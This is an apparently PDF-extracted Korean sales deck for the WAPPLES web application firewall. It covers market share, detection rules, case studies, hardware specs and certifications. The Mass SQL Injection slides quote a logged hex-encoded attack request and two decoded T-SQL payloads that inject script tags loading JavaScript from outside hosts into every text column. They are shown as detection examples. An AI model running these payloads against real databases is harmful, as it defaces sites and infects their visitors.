wapples 소개자료 v2.10 · 1.ibm internet security systems in 2008 x-force® trend & risk...

PUBLICSL5

지능형 웹 어플리케이션 방화벽

WAPPLES 소개

2013년 12월

펜타시큐리티시스템㈜

Penta Security Systems PUBLICSL52

웹방화벽의 필요성웹방화벽의 필요성I

WAPPLES 위치WAPPLES 위치II

WAPPLES 소개WAPPLES 소개III

인증 및 수상 현황인증 및 수상 현황IV


Internet에 접속되어 있다는 것=

언제든 Hacker의 공격을 받을 수 있다는 것

Gartner 보고서에서도 언급된 바 있듯이, Web 공격의 75%가 웹어플리케이션 층을 타겟으로 발생하고 있다.



2000년대 이후 공격 유형 변화 è 웹어플리케이션 공격

웹을 통한 비즈니스가 증가하면서 웹어플리케이션의 보급 확장B2B, B2C, G2C 등의 다양한 사업분야에서 내부 웹 서비스 뿐만 아니라

외부 웹 서비스를 위하여 사용하게 되면서 웹어플리케이션의 보급이 확장되는 추세

웹어플리케이션에 대한 취약성 증가모든 취약점 중에 53% 가 웹어플리케이션과 관련1

그 중 26%의 알려진 취약점만이 해결됨 (2008년 말 기준) 2

해커들의 No.1 공격 타겟매 4.5초마다 해커들에게 공격 당한 새로운 페이지가 발견2

SQL Injection 은 가장 위협적인 해킹 기법3

1. IBM Internet Security Systems in 2008 X-Force® Trend & Risk Report 2. Sophos, Security threat report: 2009 - Prepare for this year’s new threats3. WASC : The Web Hacking Incidents Database

SQL

Injection,

30%

Unknown,

29%Cross Site

Scripting

(XSS), 8%

CSRF, 3%

Others,

30%



웹어플리케이션 층에 대한 공격 위협 증가

점점 더 많은 기업, 기관, 정부 및 개인이 웹을 통한 서비스 확대로 다양한 웹 접속 장비가 시장으로유입되고 있으며, 그로 인해 웹어플리케이션 층에 대한 공격 위협은 지속적으로 증가하고 있다.

2000 Today



BYOD 시대 도래로 인한 내부 해킹 위험 증가

l Mobile Data Protection (MDP)개인 모바일 장비 해킹을 통해 가능한 웹서버 공격 유형

§ Webshell Upload § Stealth Commanding 등을 통한 서버 내부 데이터 조작§ 개인정보 유출

l 외부 공격만 방어하는 방식의 한계이미 해킹 당한 개인 모바일 장비가 기업 내 환경에 접속할 수 있기 때문에,

내부를 통한 웹서버 해킹 방지 필요

WAPPLES을 이용하여 내부망 관련 공격을 탐지하고 차단

l WAPPLES을 통한 Mobile Data Protection§ File Upload : Web Shell Upload 방지§ Stealth Commanding : 서버 내부 데이터 조작 방지§ Privacy Output/Input/File Filtering : 개인정보 유출 방지



최근 발생한 치명적인 사이버 공격들 모두 웹 해킹!

머니투데이

머니투데이 동아일보

이코노믹리뷰


NetBIOS

Ping of Death

Signature Matching

Web-basedMalware

Analyzing& Reporting

SystemMalware

SecureCoding

SQL InjectionCross Site Scripting

Encrypted DataAccess Control

OWASP TOP 10



60% 시장 점유율로 대한민국 시장을 선도.2004년 이후 2,000여대 구축하여 점유율 1위

• 독창적인 지능형 보안엔진 탑재• 오탐없이 알려지지 않은 공격까지 차단

60% 시장 점유율로 대한민국 시장을 선도.2004년 이후 2,000여대 구축하여 점유율 1위

• 독창적인 지능형 보안엔진 탑재• 오탐없이 알려지지 않은 공격까지 차단

지능형 웹방화벽 WAPPLES

No.1 데이터 암호화 솔루션2004년 이후 1,800여개의 고객사 보유

• Oracle(Enterprise/Standard), MS SQL, Server, DB2 지원

• D’Amo SG와 D’Amo SCP를 통해 다양한 보안 환경에 적용

• 강력한 보안성

No.1 데이터 암호화 솔루션2004년 이후 1,800여개의 고객사 보유

• Oracle(Enterprise/Standard), MS SQL, Server, DB2 지원

• D’Amo SG와 D’Amo SCP를 통해 다양한 보안 환경에 적용

• 강력한 보안성

통함 데이터 암호화 솔루션 D’Amo

국내 최초 SSO 솔루션• 2001년 국내 최초로 발표된 기업내부 보

안을 위한 Single Sign On 솔루션• 전사적인 정보보호 인프라로서의 Single

Sign-On 과 RBAC(role Based Access Control) 기술을 도입한 통합권한관리제공

국내 최초 SSO 솔루션• 2001년 국내 최초로 발표된 기업내부 보

안을 위한 Single Sign On 솔루션• 전사적인 정보보호 인프라로서의 Single

Sign-On 과 RBAC(role Based Access Control) 기술을 도입한 통합권한관리제공

SSO 솔루션 ISign+


§

§ 온라인 교육 사이트를 운영하는 웹 서버가 홈페이지 해킹 후 악성코드가 대량으로 배포되어 과도한 부하 발생

§ 컨텐츠를 노린 웹 공격이 중국으로부터 수시로 발생하여 정상적인 서비스 제공에 어려움을 겪음

§

§ 온라인 교육 사이트를 운영하는 웹 서버가 홈페이지 해킹 후 악성코드가 대량으로 배포되어 과도한 부하 발생

§ 컨텐츠를 노린 웹 공격이 중국으로부터 수시로 발생하여 정상적인 서비스 제공에 어려움을 겪음

§웹방화벽을 웹 서버 앞에 인라인 방식으로 설치

§로그 분석을 통해 다양한 백도어 발견, 제거

§백도어 제거 중 공격자가 설치한 다양한 악성 코드 설치를 확인하고 이를 제거

§중국으로부터의 SQL Injection 공격 등을 웹 방화벽을 통해 차단

§웹방화벽 운영을 통해 컨텐츠 복사 시도 차단

§웹방화벽을 웹 서버 앞에 인라인 방식으로 설치

§로그 분석을 통해 다양한 백도어 발견, 제거

§백도어 제거 중 공격자가 설치한 다양한 악성 코드 설치를 확인하고 이를 제거

§중국으로부터의 SQL Injection 공격 등을 웹 방화벽을 통해 차단

§웹방화벽 운영을 통해 컨텐츠 복사 시도 차단

•웹방화벽 설치 전 악성코드의 대량 유포로 인해웹 서버의 부하 증가로 수시로 부팅을 했으나웹방화벽 운영 후 부하 증가 현상이 소멸됨

•악성코드 차단 및 삭제를 통해 서비스를 위한네트워크 대역폭 확보

•교육 사이트의 주요 자산인 컨텐츠 복사 근절

•웹방화벽 설치 전 악성코드의 대량 유포로 인해웹 서버의 부하 증가로 수시로 부팅을 했으나웹방화벽 운영 후 부하 증가 현상이 소멸됨

•악성코드 차단 및 삭제를 통해 서비스를 위한네트워크 대역폭 확보

•교육 사이트의 주요 자산인 컨텐츠 복사 근절

고객 상황

대응

도입 효과

설치 구성도



§이중화된 네트워크 지원을 위해 웹방화벽 이중화

§Active/Standby 구성 및 인라인 방식 구축

§업무 처리시 발생되는 웹 어플리케이션 오류 확인

§개인정보 유출 경로 파악 조치

§자동화된 공격 발생시, 자동으로 블랙리스트

IP관리 기능 활용, URL 접근제어 기능 반영

§이중화된 네트워크 지원을 위해 웹방화벽 이중화

§Active/Standby 구성 및 인라인 방식 구축

§업무 처리시 발생되는 웹 어플리케이션 오류 확인

§개인정보 유출 경로 파악 조치

§자동화된 공격 발생시, 자동으로 블랙리스트

IP관리 기능 활용, URL 접근제어 기능 반영

§ 개인정보 유출 / 웹 어플리케이션 오류 URL보호를 통한 신뢰성 제공

§ 자동화된 공격 차단으로 인한, 서비스 안전성 및가용성 증가

§ 보안 감사 시 소스코드 수정 등에 비해 TCO 절감§ 내부 중요서버 어플리케이션에 대해, 인가된 사

용자만 접근 가능함에 따라, 내부정보 유출 방지

§ 개인정보 유출 / 웹 어플리케이션 오류 URL보호를 통한 신뢰성 제공

§ 자동화된 공격 차단으로 인한, 서비스 안전성 및가용성 증가

§ 보안 감사 시 소스코드 수정 등에 비해 TCO 절감§ 내부 중요서버 어플리케이션에 대해, 인가된 사

용자만 접근 가능함에 따라, 내부정보 유출 방지

대응

도입 효과

설치 구성도

§ 외부에 노출된 그룹웨어 및 내부 중요 서버에 대한 보안

§ 개인정보 유출 및 지속적인 자동화된 공격 보호 필요

§ 외부에 노출된 그룹웨어 및 내부 중요 서버에 대한 보안

§ 개인정보 유출 및 지속적인 자동화된 공격 보호 필요

고객 상황




- 500 1,000 1,500 2,000

구축수

펜타시큐리티

P사

T사

M사

기타

(2013년 12월 누적기준)


A. 침입 방지조달 판매량 (2008년 ~ 2012년)

0%

10%

20%

30%

40%

50%

60%

70%

80%

2008년 2009년 2010년 2011년 2012년

펜타시큐리티시스템

트리니티소프트

파이오링크

윈스테크넷

이지서티

모니터랩

판매순위 회사명 2008년 2009년 2010년 2011년 2012년 합계

1위 펜타시큐리티시스템 53 EA 93 EA 39 EA 38 EA 64 EA 287 EA

2위 트리니티소프트 32 EA 24 EA 9 EA 12 EA 11 EA 88 EA

3위 파이오링크 23 EA 8 EA 17 EA 14 EA 62 EA

4위 윈스테크넷(나우콤) 9 EA 19 EA 12 EA 3 EA 43 EA

5위 이지서티 5 EA 1 EA 6 EA

6위 모니터랩 2 EA 2 EA




A. 침입 방지웹방화벽 WAPPLES 특징

패턴 + 논리로직분석 엔진을 통한 높은 보안성1

27가지 룰 정책으로 OWASP 10대 항목 외 해킹 다중탐지2

동일사 검증필 암호모듈 탑재로 업데이트 및 유사시 원활한 지원3

SSL 없이 Client와 웹방화벽 구간 암호화 기능 지원4

통합관리솔루션(WAPPLES-MS) 및 I.C.S 지원5

관리 편의성 UI – 화면 분할, Preset 정책, Drag&drop, Dot net 기반6

다중 네트워크 지원 및 다양한 구성 환경 지원(In-Line, Proxy, One-Armed)7


WAPPLES 공격 탐지엔진: 3가지 평가 방식을 기반으로 한 26개의 룰로 구성

• Heuristic(학습) 분석 기반의 평가• Semantic(의미) 분석 기반의 평가• Pattern Matching(패턴 매칭) 기반의 평가

Heuristic(학습) 분석 기반의 평가 Semantic(의미) 분석 기반의 평가 Pattern Matching(패턴 매칭) 기반의 평가

Cross Site Scripting Buffer Overflow

Include Injection Directory Listing

Cookie Poisoning Invalid HTTP Error Handling

IP Block Invalid URI Extension Filtering

Parameter Tampering Parameter Tampering File Upload

Suspicious Access Privacy File Filtering Input Content Filtering

URI Access Control Privacy Input Filtering IP Filtering

Privacy Output Filtering Request Method Filtering

Request Header Filtering Response Header Filtering

SQL Injection User Defined Pattern

Stealth Commanding Web Site Defacement

Unicode Directory Traversal




Mass SQL Injection Bot

q DB에 악성 Java Script 삽입q SQL Injection 공격의 자동화 및 혼합

= SQL Injection + Cross Site Scripting

q 공격의 최종 목적은 웹 서버가 아닌 사용자 브라우저= 트로이 목마 또는 키 로거(Key logger) 설치

q 다중 인코팅2008-03-29 19:02:41 W3SVC1397586572 211.195.232.19 POST /OOOO/OOOOOO/OOOOOO_OOOOO_view.asp bid=pds_vod&num=51&page=1&od=&ky=&sh=';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000430020007600610……NVARCHAR(4000));EXEC(@S);-- 80 - 60.172.219.4 Mozilla/3.0+(compatible;+Indy+Library) - - 200 0 0

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+'‘<script src=http://www.nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

q 16진수 à string à UTF-8 à ASCII


Mass SQL Injection 탐지 사례

Declare @T Varchar(255), @C Varchar(255) Declare Table_cursor Cursor For Select A.Name,B.Name From Sysobjects A, Syscolumns B Where A.Id = B.Id And A.Xtype='u' And (B.Xtype=99 or B.Xtype=35 or B.Xtype=231 or B.Xtype=167)Open Table_Cursor Fetch Next from table_cursor into @T, @C while (@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar(8000),['+@c+']))+''<script src=http://3b3.org./c.js></script>''')fetch next from table_cursor into @t, @c end close table_cursor deallocate table_cursor




트래픽 통계(3D Line 그래프)

트래픽 통계(3D Line 그래프)

공격 통계(Pie Chart)공격 통계

(Pie Chart)탐지 로그탐지 로그

WAPPLES UI : 다양한 정보를 시각화



WAPPLES UI : 설정 마법사를 통한 운용성, 상세 로그 검색 및 백업, 복구



A. 침입 방지웹방화벽 WAPPLES 특장점

1. 패턴방식 + 논리로직분석 엔진 탑재

• 등록수가 한정되어 있는 패턴이 아닌 공격 기법 분석 통한 정확한 웹 공격 탐지 기능

•사례 1 : 중국으로부터의 다양한 SQL Injection 공격 탐지•사례 2 : 신종 DDoS 공격인 Slowloris 공격 및 RUDY(Are You Dead Yet) 공격 탐지•사례 3 : 주민등록번호 검증 메커니즘을 통한 정확한 개인정보 유출방지

• 등록수가 한정되어 있는 패턴이 아닌 공격 기법 분석 통한 정확한 웹 공격 탐지 기능

•사례 1 : 중국으로부터의 다양한 SQL Injection 공격 탐지•사례 2 : 신종 DDoS 공격인 Slowloris 공격 및 RUDY(Are You Dead Yet) 공격 탐지•사례 3 : 주민등록번호 검증 메커니즘을 통한 정확한 개인정보 유출방지




2. 고객과 웹방화벽 구간을 SSL 없이 암호화

• 웹서버에 많은 부하를 주는 SSL의 단점을 극복한 WAPPLES만의 고유한 암호화 기능• 고객으로부터 전송되는 HTML Form을 지정하여 해당 Form을 암호화 해주는 기능• IE. FireFox, Chrome, Safari, Opera 등 Multi-Browser를 지원

• 웹서버에 많은 부하를 주는 SSL의 단점을 극복한 WAPPLES만의 고유한 암호화 기능• 고객으로부터 전송되는 HTML Form을 지정하여 해당 Form을 암호화 해주는 기능• IE. FireFox, Chrome, Safari, Opera 등 Multi-Browser를 지원




3. 통합관리솔루션 WAPPLES-MS

• 네트워크로 연결된 여러 대의 WAPPLES을 하나의 관리 콘솔에서 통합관리• 그룹 내 보안정책 동기화, 계층화된 보안 관리자 지정, 통합된 통계 보고서 생성 등• 네트워크로 연결된 여러 대의 WAPPLES을 하나의 관리 콘솔에서 통합관리• 그룹 내 보안정책 동기화, 계층화된 보안 관리자 지정, 통합된 통계 보고서 생성 등

WAPPLES MS 구성도




4. Application Layer(L7 Layer) DDoS 방어

• WAPPLES의 Suspicious Access 룰의 사용자 설정에서 MayBlock Time을 설정하여Slowloris, R.U.D.Y 등의 L7 DDoS 공격을 차단 기능 제공• WAPPLES의 Suspicious Access 룰의 사용자 설정에서 MayBlock Time을 설정하여Slowloris, R.U.D.Y 등의 L7 DDoS 공격을 차단 기능 제공

웹 DDoS 공격에 대해임계치 값을 설정할 수 있음

웹 DDoS 공격에 대해임계치 값을 설정할 수 있음




5. ICS WMP (WAPPLES MANAGEMENT PORTAL)

• 웹 GUI 기반의 WAPPLES Management Portal 서비스로 스마트폰으로 모니터링 가능• WAPPLES ID 별 상태(정상/위험/장애/비활성) 및 시스템 현황 모니터링• 무응답과 같은 WAPPLES 비정상 상태시 알림 기능 제공(SMS, E-Mail)

• 웹 GUI 기반의 WAPPLES Management Portal 서비스로 스마트폰으로 모니터링 가능• WAPPLES ID 별 상태(정상/위험/장애/비활성) 및 시스템 현황 모니터링• 무응답과 같은 WAPPLES 비정상 상태시 알림 기능 제공(SMS, E-Mail)


구분 WAPPLES-50 WAPPLES-100eco

어플라이언스 1U Rack type 1U Rack type

Memory 4 GB 4 GB

HDD 160GB 500GB

Throughput 최대 100 Mbps 최대 500 Mbps

NIC10/100/1000 x 6 port (Bypass 4port)(1 for management)

8 x 10/100/1000 BaseTX(1 for management)

외장


* 웹서버 등록 제한: 4대


구분 WAPPLES-500 WAPPLES-1200


Memory 8 GB 8 GB

HDD 500GB 1TB

Throughput 최대 500 Mbps 최대 2 Gbps

NIC

10/100/1000 x 4 port (Bypass 2port)

추가 구성 : 10/100/1000 x 4 port (Bypass 4port)혹은 Fiber Gbic x 2 port (Bypass 2port)

2 x 10/100/1000 Base TX4 x 10/100/1000 Base TX Bypass

추가 구성: 4 x 10/100/1000 BaseTX Bypass8 x 10/100/1000 BaseTX Bypass4 x 1000 Base SFP8 x 1000 Base SFP2 x 1000 Base Optical Bypass

외장



구분 WAPPLES-2200 WAPPLES-5000


Memory 16 GB 24 GB

HDD 1TB 1TB

Throughput 최대 4 Gbps 최대 10 Gbps

NIC

2 x 10/100/1000 Base TX4 x 10/100/1000 Base TX Bypass

추가 구성: 4 x 10/100/1000 BaseTX Bypass8 x 10/100/1000 BaseTX Bypass8 x 1000 Base SFP2 x 1000 Base Optical Bypass2 x 10G Base SFP2 x 10G Base Optical Bypass

2 x 10/100/1000 BaseTX8 x 10/100/1000 BaseTX Bypass4 x 1000 BaseSFP2 x 1000 Base Optical Bypass

추가 구성: 4 x 1000 Base Optical Bypass2 x 10G Base Optical Bypass

외장




구분 내용 WAPPLES 비고

전문성 제조사의 전문성 여부1997년 설립된

웹보안 전문 회사

안정성고객 운용수에 따른 회사 및

제품의 안정성 여부2,000여대로

국내 1위 점유율

신뢰성 제조사의 체계적인 기술지원 여부웹방화벽 전담 부서 운용 및

유사시 지역 협력사 인원 지원

보안성 OWASP 10대 및 국정원 8대 취약점 외에기타 해킹 유형을 탐지 및 차단

총 27개의 룰/Function으로 다중 탐지

편의성관리자의 편의성을 고려한 UI 및

정책 설정여부Dot NET 기반의 유연한 UI

인증 보안장비의 기준이 되는 인증 여부CC인증(EAL4), GS인증,

IPv6 Ready Logo Silver Mark,동일사 검증필 암호모듈 탑재

기타 기타 선정 및 운용에 필요한 사항녹색경영(Green Biz) 선정 기관,Intelligent Customer Service


인증 및 수상 현황인증 및 수상 현황IV

인증 현황

2003.08: NIGT의 FIPS 46-3, FIPS 197 인증 획득2007.03: 정보통신기술협회(TTA) GS(Good Software) 인증2008.01: 암호모듈(CIS-CC ) 검증필2009.12: PCI-DSS 준수 인증 획득2010.04: MAPP(Microsoft Active Protections Program) 가입2010.10: IPv6 Ready Logo Silver Mark 인증 획득2011.08: D’Amo 2.3 SAP 인증 추가 (독일 SAP社)2011.12: VMWare Solution Provider 자격 획득2012.09: 품질경영 시스템 인증 (ISO 9001:2008) 획득2012.09: 환경경영시스템 인증 (ISO 14001) 획득2012.10: D’Amo v3.0 GS 인증 획득2012.11: 국제 CC(Common Criteria) EAL4 인증

수상 현황

2008.11: 한국지능정보시스템학회 인텔리전스 대상 수상2009.04: 지식경제부 신소프트웨어 상품대상 수상2009.11: ‘신기술실용화 촉진대회’ 국무총리상 수상2010.02: 제 9 회 대한민국 SW 기업 경쟁력 대상 ‘고객만족도 부문 최우수상’수상2010.07: 2010년 상반기 IT혁신제품 선정2011.02: 제 10회 대한민국 SW 기업 경쟁력 특별상 수상2012.05: 특허 스타 기업 선정2012.11: 지식 정보 보안 산업 유공자 지식경제부장관 표창 수상2012.11: 2012 벤처 활성화 유공자 중소 기업청장 표창

t h a n k y o u

Copyright 2013 Penta Security Systems Inc. All rights reserved.

Penta Security Systems Inc. (본사)

서울특별시 영등포구 여의도동 25-11 한진해운빌딩 20층 / 제품사업본부Mobile. 010-2336-8604 Tel. 02-2125-6641 Fax. 02-786-5281 / www.pentasecurity.com

대신정보통신(주)

서울시 금천구 가산동 448번지 대륭테크노타운 3차 2층 대신정보통신㈜ 보안사업본부 고재민 과장

TEL. 02-2107-5051 FAX. 02-2107-5190 H.P. 010-9136-0760 / [email protected]

Ver. 2.10

wapples 소개자료 v2.10 · 1.ibm internet security systems in 2008 x-force® trend & risk...

Documents